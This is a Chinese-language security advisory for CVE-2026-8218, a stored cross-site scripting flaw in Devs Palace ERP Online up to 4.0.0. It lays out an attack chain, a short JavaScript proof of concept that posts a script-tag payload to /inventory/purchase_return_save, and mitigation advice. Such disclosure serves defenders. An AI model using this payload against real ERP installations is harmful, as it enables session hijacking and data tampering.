CVE-2026-8218 Devs Palace ERP Online XSS漏洞

漏洞信息

漏洞编号

CVE-2026-8218

漏洞类型

跨站脚本

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

Devs Palace ERP Online

漏洞概述

Devs Palace ERP Online 4.0.0及之前版本存在跨站脚本漏洞。该漏洞源于文件/inventory/purchase_return_save中的未知功能对用户输入处理不当。攻击者可诱导高权限用户进行交互，从而远程执行恶意脚本代码。由于厂商尚未对此漏洞做出回应，且利用代码已公开，系统面临潜在的安全风险，需引起高度重视。

技术细节

该漏洞的核心在于Devs Palace ERP Online系统在处理/inventory/purchase_return_save文件相关的请求时，未能正确过滤和转义用户提交的输入数据。攻击者可以利用这一缺陷，构造包含恶意JavaScript代码的请求发送至服务器。根据CVSS评分向量，攻击需要较高权限（PR:H）且需要用户交互（UI:R），这暗示该漏洞极可能涉及存储型XSS机制。即攻击者首先将Payload注入并存储在服务器数据库中，随后诱导具有高权限的管理员或其他用户访问受影响的数据展示页面。当浏览器解析该页面时，嵌入的恶意脚本将被执行。一旦攻击成功，攻击者可以劫持用户会话、窃取敏感Cookie信息、篡改页面内容或执行其他基于浏览器的攻击行为，进而威胁系统的完整性与机密性。

攻击链分析

STEP 1

侦察

攻击者识别目标正在使用Devs Palace ERP Online 4.0.0或更早版本。

STEP 2

漏洞利用准备

攻击者构造包含恶意JavaScript代码的XSS Payload，专门针对/inventory/purchase_return_save端点。

STEP 3

Payload注入

攻击者利用获取的高权限账户向系统发送包含恶意代码的采购退货请求，将Payload存储在数据库中。

STEP 4

诱导触发

诱导管理员或其他高权限用户访问包含该数据的页面（UI:R）。

STEP 5

执行攻击

受害者的浏览器解析恶意脚本，执行攻击者定义的操作，如窃取Session或篡改数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2026-8218
// Target: Devs Palace ERP Online <= 4.0.0
// Endpoint: /inventory/purchase_return_save
// Description: Injecting a script payload to test XSS vulnerability

// This script demonstrates a potential payload injection.
// It requires an authenticated session (High Privilege).

fetch('/inventory/purchase_return_save', {
    method: 'POST',
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded',
    },
    body: 'product_id=1&quantity=1&return_reason=<script>alert("CVE-2026-8218_XSS")</script>'
})
.then(response => response.text())
.then(data => {
    console.log("Payload sent. Check the inventory return logs to trigger the XSS.");
})
.catch(error => console.error('Error:', error));

影响范围

Devs Palace ERP Online <= 4.0.0

防御指南

临时缓解措施

由于厂商尚未发布修复补丁，建议暂时限制对/inventory/purchase_return_save模块的访问权限，仅允许极少数可信人员操作。同时，管理员应定期审查系统日志，关注异常的数据提交记录。加强对高权限账户的安全管理，避免在处理业务数据时访问不可信的链接。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8218
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8218
3 Details https://www.cvedetails.com/cve/CVE-2026-8218/
4 VulDB https://vuldb.com/cve/CVE-2026-8218
5 Link https://olografix.org/acme/_poc/ERP_Online-POC1.gif
6 Link https://vuldb.com/submit/808252
7 Link https://vuldb.com/submit/808259
8 Link https://vuldb.com/vuln/362435
9 Link https://vuldb.com/vuln/362435/cti